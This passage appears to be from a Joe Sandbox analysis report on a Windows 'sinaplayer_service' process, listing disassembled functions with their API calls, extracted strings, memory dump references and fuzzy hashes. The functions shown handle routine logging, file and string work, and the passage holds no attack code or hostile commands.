                                                                                                                                                                                                    • Instruction ID: 849c84f35712e5119d38b300edd5550b173975a1b1740d650b5becba76a42c30
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 212ce1d042f7dc8117879231a7c224855de085e24b32c99cffd32d732b5277e9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC214475D002089FDB11DFA4DD86BDEBBB8FB08764F10466AE815E3790DB3659448B60
                                                                                                                                                                                                    Function 003873B0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 74windowfileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000,8285FFAB,?,?), ref: 003873E4
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 003873F2
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE(?,?,?), ref: 00387406
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(network_change\file_stream_context_win.cc,000000A2,00000001,?,?,?), ref: 00387423
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?), ref: 0038744A
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,?,?), ref: 00387462
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@Message@logging@@V?$basic_streambuf@$??6?$basic_ostream@?setstate@?$basic_ios@_?uncaught_exception@std@@ErrorFileLastLevel@logging@@Osfx@?$basic_ostream@U?$char_traits@_V01@W@std@@@std@@
                                                                                                                                                                                                    • String ID: SetEndOfFile failed: $network_change\file_stream_context_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 3443877305-612808891
                                                                                                                                                                                                    • Opcode ID: dfdfaf3b34888a08bb96c661fb98f4cc8f250aa5d59d44a1737f04245cef8341
                                                                                                                                                                                                    • Instruction ID: 0cfb2e8106e0b9000e75663188a06473a0ac824f7decfa005bc1ace908547957
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfdfaf3b34888a08bb96c661fb98f4cc8f250aa5d59d44a1737f04245cef8341
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6217472A44308AFDB11DF94DC86BDEBBBCFB05750F10466AE915E3390EB3699048B60
                                                                                                                                                                                                    Function 6C570D5C Relevance: 15.2, APIs: 10, Instructions: 208COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000003,00000000,00000004,?,?,?,6C570F30,00000000,00000000,00000000), ref: 6C570D9F
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,?,6C570F30,00000000,00000000,00000000,00000000,?,?), ref: 6C570E14
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,?,00000000,?,00000000,00000000,?,?,?,6C570F30,00000000,00000000,00000000,00000000,?,?), ref: 6C570E31
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,00000400,00000000,?,?,00000000,?,?), ref: 6C570EAD
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 6C570ED2
                                                                                                                                                                                                    • _freea_s.MSVCR120(?,?,?,?,?,?,?,?,?), ref: 6C570EDB
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,6C570F30,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6C570EE2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$String__crt_freea_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2471089800-0
                                                                                                                                                                                                    • Opcode ID: e9b7e301108fdf05713d4138058e4d94811d059c24fadcc45b312c62f408c0a8
                                                                                                                                                                                                    • Instruction ID: 34ae5b530881840237915a40310f36dea0d887eb8127a6f7cdcfc37c8750875f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9b7e301108fdf05713d4138058e4d94811d059c24fadcc45b312c62f408c0a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C851C171A0125AAFEF24CE65CC54FAF36A9EB89314F10065AFC19D7A50D772DC9087A0
                                                                                                                                                                                                    Function 6C562E3F Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?,?,?,?,00000000,?,?), ref: 6C562E94
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    • Opcode ID: 99ed86786a81d705fa76452bfc77380f0c7fabcecf4dc8b423cd5f95bf9a06ef
                                                                                                                                                                                                    • Instruction ID: 92204265a4215fb6ae953dfcca2c4fe22f184541e33617bd6fb841a4e99436a8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99ed86786a81d705fa76452bfc77380f0c7fabcecf4dc8b423cd5f95bf9a06ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8418331A05256DFDB118F6ACC48BAF7BA8AF46719F200565E869D79A0DF30CC11C7A1
                                                                                                                                                                                                    Function 00380A80 Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?AsUTF8Unsafe@FilePath@base@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.BASE(?,8285FFAB), ref: 00380AD2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,6C6C52C0), ref: 00380AFC
                                                                                                                                                                                                    • ??0FileEnumerator@base@@QAE@ABVFilePath@1@_NH@Z.BASE(8285FFAB,00000001,00000003,?,6C6C52C0), ref: 00380B2C
                                                                                                                                                                                                    • ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ.BASE(000000FF), ref: 00380B43
                                                                                                                                                                                                    • ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ.BASE(?), ref: 00380B93
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 00380BA1
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380BAE
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380BBD
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380BD9
                                                                                                                                                                                                      • Part of subcall function 00380560: ??0FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 003805AA
                                                                                                                                                                                                      • Part of subcall function 00380560: ?AppendRelativePath@FilePath@base@@QBE_NABV12@PAV12@@Z.BASE(00000000,?), ref: 003805BE
                                                                                                                                                                                                      • Part of subcall function 00380560: ?AsUTF8Unsafe@FilePath@base@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.BASE(?), ref: 003805D2
                                                                                                                                                                                                      • Part of subcall function 00380560: ?ReplaceSubstringsAfterOffset@@YAXPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IABV12@1@Z.BASE(?,00000000,00000000,00000000,0039E4E0,00000001,0039E4DC,00000001), ref: 00380634
                                                                                                                                                                                                      • Part of subcall function 00380560: ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00380646
                                                                                                                                                                                                      • Part of subcall function 00380560: ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038066D
                                                                                                                                                                                                      • Part of subcall function 00380560: ?DirectoryExists@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 00380676
                                                                                                                                                                                                    • ??1FileEnumerator@base@@QAE@XZ.BASE ref: 00380BEE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$Enumerator@base@@$??3@D@2@@std@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$Next@Path@2@Unsafe@$AfterAppendDirectoryExists@base@@Offset@@Path@Path@1@@Path@1@_RelativeReplaceSubstringsV01@V01@@V12@V12@1@V12@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 702793742-0
                                                                                                                                                                                                    • Opcode ID: f10923ecce2ed36f9ee66cd44a6d309715c46608df33d9ab94b91f2fdc534f58
                                                                                                                                                                                                    • Instruction ID: 63477ac7f604ee689469843be5b34eab0edc718ec08c49097b7b487a8e0ed1de
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f10923ecce2ed36f9ee66cd44a6d309715c46608df33d9ab94b91f2fdc534f58
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D41AF71800249EFDF16DF94DC55BEEBBB8EF15328F1441A9E81563281EB355A48CF60
                                                                                                                                                                                                    Function 0038CEF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 203COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00374FE0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?,?), ref: 00374FFA
                                                                                                                                                                                                      • Part of subcall function 00374FE0: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,?,?,00375150,?,?,?,?,?,?,00371E69,?,?), ref: 0037501A
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0038D132
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038D141
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xout_of_range@std@@$??1?$basic_ios@_??3@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID: .$.txt$chs
                                                                                                                                                                                                    • API String ID: 495842565-1930578300
                                                                                                                                                                                                    • Opcode ID: 1ff01c1049b343d755ace77897f63de28d08235c77dbe4d43452d3f335a67200
                                                                                                                                                                                                    • Instruction ID: 1376761219f948f6a478682e35e0f52e6506249f2c6a7348a37472877df8a66e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff01c1049b343d755ace77897f63de28d08235c77dbe4d43452d3f335a67200
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E818A70A00208DFEF26EB64C859FEDB7B4BF09310F1441A9E516AB2D1E774AE44CB50
                                                                                                                                                                                                    Function 00390290 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: EnterCriticalSection.KERNEL32(0038EBA0,8285FFAB,?,00000000,?), ref: 0038FC0A
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: EnterCriticalSection.KERNEL32(0038EBA0), ref: 0038FC17
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: LoadLibraryW.KERNEL32(rpcrt4.dll), ref: 0038FC28
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: LeaveCriticalSection.KERNEL32(0038EBA0), ref: 0038FC3B
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: GetProcAddress.KERNEL32(?,UuidCreate), ref: 0038FC51
                                                                                                                                                                                                      • Part of subcall function 0038FBC0: LeaveCriticalSection.KERNEL32(0038EBA0), ref: 0038FC64
                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,8285FFAB,?,00000000,?,003904E5,?,?,00000000), ref: 00390398
                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000), ref: 003903CE
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 003903DC
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 003903ED
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00390412
                                                                                                                                                                                                      • Part of subcall function 0038FE70: memset.MSVCR120 ref: 0038FFBF
                                                                                                                                                                                                      • Part of subcall function 0038FE70: memset.MSVCR120 ref: 0038FFD2
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00000007,?,?,0038EBA0,?,00000000,00000000,00000000), ref: 003904A5
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 003904B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CloseHandle$??3@CreateEnterFileLeavememset$AddressLibraryLoadProc
                                                                                                                                                                                                    • String ID: -full.dmp
                                                                                                                                                                                                    • API String ID: 3657708945-2448600480
                                                                                                                                                                                                    • Opcode ID: 1ea2d3cfd04ac730c630225dd667a9bb97253bd1d7f5294e1f4c7481c7ebe8d9
                                                                                                                                                                                                    • Instruction ID: 8c90261c23e5b45cdf5679ab3aa9eee68f60edaf506cb9c1cd50454e36f73930
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ea2d3cfd04ac730c630225dd667a9bb97253bd1d7f5294e1f4c7481c7ebe8d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB615971A00208EFDF16DFA9CC85BEEBBB4AF08724F254229E525B72D0D774A945CB50
                                                                                                                                                                                                    Function 0037E080 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,00379620,6C6C52C0,89,0037E213,89,00379620,?,00379620,?,?,?,003764FB,00000000,?), ref: 0037E0BD
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,E8FFFFFF,00379620,00000000,?,00379620,6C6C52C0,89,0037E213,89,00379620,?,00379620,?,?), ref: 0037E11B
                                                                                                                                                                                                    • memmove.MSVCR120(0039E338,0039E338,0001DECC,00379620,00000000,?,00379620,6C6C52C0,89,0037E213,89,00379620,?,00379620,?,?), ref: 0037E164
                                                                                                                                                                                                    • memcpy.MSVCR120(00379620,00379620,E8FFFFFF,00379620,00000000,?,00379620,6C6C52C0,89,0037E213,89,00379620,?,00379620,?,?), ref: 0037E193
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,00379620,6C6C52C0,89,0037E213,89,00379620,?,00379620,?,?,?,003764FB,00000000,?), ref: 0037E1B3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memmove$Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                                                                                                                                    • String ID: 89$invalid string position$string too long
                                                                                                                                                                                                    • API String ID: 2530380750-3118988713
                                                                                                                                                                                                    • Opcode ID: cc7afdb02a8286ec12c41d8fb9a8d7e7744d59153db82c72d3354adef30d6399
                                                                                                                                                                                                    • Instruction ID: aed235cff49ba5da8a15b185df5c1c1883b9e66048b904c982d3a203bf0e84a1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc7afdb02a8286ec12c41d8fb9a8d7e7744d59153db82c72d3354adef30d6399
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2651A431310119DBCB36CE58DCC5C6AB7AEFF89741760895EE80ACB251DB35E950CBA0
                                                                                                                                                                                                    Function 00372110 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143networkCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memset$CrackInternetprintf
                                                                                                                                                                                                    • String ID: <$Error:InternetCrackUrl failed!
                                                                                                                                                                                                    • API String ID: 514117978-3291073569
                                                                                                                                                                                                    • Opcode ID: ecde6387cfbb8d328625b37260eddcc2f9053a3c5300c29d17c075522fffd9e2
                                                                                                                                                                                                    • Instruction ID: b455b56574e6de1220137752066c27e288ace0012bbbd89c12686009c36452dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecde6387cfbb8d328625b37260eddcc2f9053a3c5300c29d17c075522fffd9e2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F51D7719442199BDB35DF14CC45BEBB3B9FF04304F00459AE50AAB681EB76AB94CF90
                                                                                                                                                                                                    Function 6C57CE5C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(6C57CF58,00000010,6C57CFF4,000000FD,6C57CD81), ref: 6C57CE6B
                                                                                                                                                                                                      • Part of subcall function 6C56F81C: _getptd.MSVCR120(6C56F8A8,0000000C,6C56F8E3,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C56F82D
                                                                                                                                                                                                      • Part of subcall function 6C56F81C: _lock.MSVCR120(0000000D,6C56F8A8,0000000C,6C56F8E3,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C56F845
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000220,6C57CF58,00000010,6C57CFF4,000000FD,6C57CD81), ref: 6C57CE97
                                                                                                                                                                                                      • Part of subcall function 6C562226: malloc.MSVCR120(6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C562237
                                                                                                                                                                                                      • Part of subcall function 6C578C4C: IsValidCodePage.KERNEL32(-00000030,00000000,00000000,00000000), ref: 6C578CAC
                                                                                                                                                                                                      • Part of subcall function 6C578C4C: GetCPInfo.KERNEL32(00000000,?), ref: 6C578CBB
                                                                                                                                                                                                      • Part of subcall function 6C578C4C: memset.MSVCR120(00000019,00000000,00000101), ref: 6C578CD3
                                                                                                                                                                                                    • _lock.MSVCR120(0000000D), ref: 6C57CF16
                                                                                                                                                                                                    • free.MSVCR120(?,6C57CF58,00000010,6C57CFF4,000000FD,6C57CD81), ref: 6C5A759E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd_lock$CodeInfoPageValid_malloc_crtfreemallocmemset
                                                                                                                                                                                                    • String ID: xw
                                                                                                                                                                                                    • API String ID: 1238899101-2371563245
                                                                                                                                                                                                    • Opcode ID: d0ddb3a65bf8ecf45e4776ff17183d54dc520716468e8ffab379f57bbc1f52af
                                                                                                                                                                                                    • Instruction ID: 921bd7be188132c53fc24621fbc7beda776a0028405a1dbfdcd3482b04945d03
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0ddb3a65bf8ecf45e4776ff17183d54dc520716468e8ffab379f57bbc1f52af
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7641E871A05250CFCB25EF6DCC80A9977F0AB4A364F140569E8549BFD1CB74ACC2CBA5
                                                                                                                                                                                                    Function 0037FD8D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(00000003), ref: 0037FD90
